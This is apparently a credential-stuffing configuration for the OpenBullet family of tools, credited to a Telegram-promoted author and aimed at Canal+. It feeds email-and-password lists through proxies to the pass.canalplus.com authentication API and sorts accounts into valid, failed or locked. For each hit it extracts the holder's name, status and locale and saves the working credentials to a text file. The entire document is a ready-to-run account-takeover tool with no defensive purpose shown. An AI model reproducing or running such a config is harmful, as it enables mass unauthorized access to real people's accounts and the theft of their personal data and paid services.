[SETTINGS]
{
  "Name": "MYCANALPLUS😈Thelokojo",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2022-07-11T18:50:46.5811419-05:00",
  "AdditionalInfo": "https://t.me/Thelokojovip",
  "Author": "@Thelokojo_vip",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://pass.canalplus.com/api/v1/authn" 
  CONTENT "{\"password\":\"<PASS>\",\"username\":\"<USER>\",\"options\":{\"warnBeforePasswordExpired\":true,\"multiOptionalFactorEnroll\":true},\"stateToken\":\"\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: pass.canalplus.com" 
  HEADER "Connection: keep-alive" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"94\", \"Google Chrome\";v=\"94\", \";Not A Brand\";v=\"99\"" 
  HEADER "x-okta-user-agent-extended: okta-signin-widget-4.5.2" 
  HEADER "accept-language: en" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.54 Safari/537.36" 
  HEADER "accept: application/json" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Origin: https://pass.canalplus.com" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Content-Length: 193" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "status\":\"SUCCESS" 
    KEY "{\"expiresAt\":\"" 
  KEYCHAIN Failure OR 
    KEY "{\"errorCode\":" 
    KEY "errorId" 
    KEY "Authentication" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "LOCKED" 

#TOKEN1 PARSE "<SOURCE>" JSON "firstName" CreateEmpty=FALSE -> CAP "FIRST_NAME " 

#TOKEN2 PARSE "<SOURCE>" JSON "lastName" CreateEmpty=FALSE -> CAP "LAST_NAME" 

#TOKEN3 PARSE "<SOURCE>" LR "\"status\":\"" "\"" -> VAR "Status" 

#TOKEN4 PARSE "<SOURCE>" LR "locale\":\"" "\"," CreateEmpty=FALSE -> CAP "locale" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<Status>" Contains "SUCCESS" 
  KEYCHAIN Custom "FREE" OR 
    KEY "<Status>" DoesNotContain "SUCCESS" 

FUNCTION Constant "Premium" -> CAP "Plan" 

UTILITY File "MYCANALPLUS.txt" AppendLines "\\n<===========| MYCANALPLUS_Thelokojo |===========>\\nCorreo: <USER>\\nContraseña: <PASS>\\nFIRST_NAME : <FIRST_NAME >\\nLAST_NAME: <LAST_NAME>\\nStatus: <Status>\\nlocale: <locale>\\n" 

